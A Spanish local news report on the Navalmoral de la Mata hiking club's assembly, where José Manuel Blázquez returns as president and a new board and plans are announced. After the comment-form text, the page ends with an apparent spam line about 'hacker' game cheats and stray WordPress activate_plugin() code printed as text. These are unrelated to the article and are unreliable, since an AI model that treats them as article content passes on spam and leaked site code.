El Centro Excursionista de Navalmoral de la Mata renueva su directiva


José Manuel Blázquez vuelve a la presidencia del Centro Excursionista del Campo Arañuelo, de Navalmoral de la Mata, que ya ocupó años atrás. Fue en la asamblea general ordinaria que el CECA pudo celebrar, por fin, en la noche del viernes en la casa del deporte tras varios aplazamientos debido a la situación generada por la covid-19 y la normativa de la Junta de Extremadura vigente al respecto.

Antes de renovar la directiva se procedió a informar sobre las cuentas anuales a 31 de diciembre y sobre el calendario de rutas programadas para el 2021, siempre que puedan realizarse y lo permitan las inclemencias meteorológicas.

Después se procedió a la elección y votación unánime de la nueva junta, que forman José Manuel Blázquez como presidente; María Magdalena Orgaz como vicepresidenta, secretaria general y tesorera; Primitivo González como responsable de Informática y Proyectos y Rafael Fernández, María del Mar Fernández, Luciano Gómez, Manuel González y Alejandro Pérez como encargados de las rutas.

Nuevas iniciativas

Por último, tomó la palabra el nuevo presidente para avanzar, en nombre de la directiva entrante, algunos de los objetivos que se han marcado para esta etapa, como una mayor presencia del club en las redes sociales, una campaña captación de socios, recuperar el cartel anunciador de las rutas, potenciar las salidas por el Campo Arañuelo y su entorno o revisar las normas del club y de las propias rutas.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );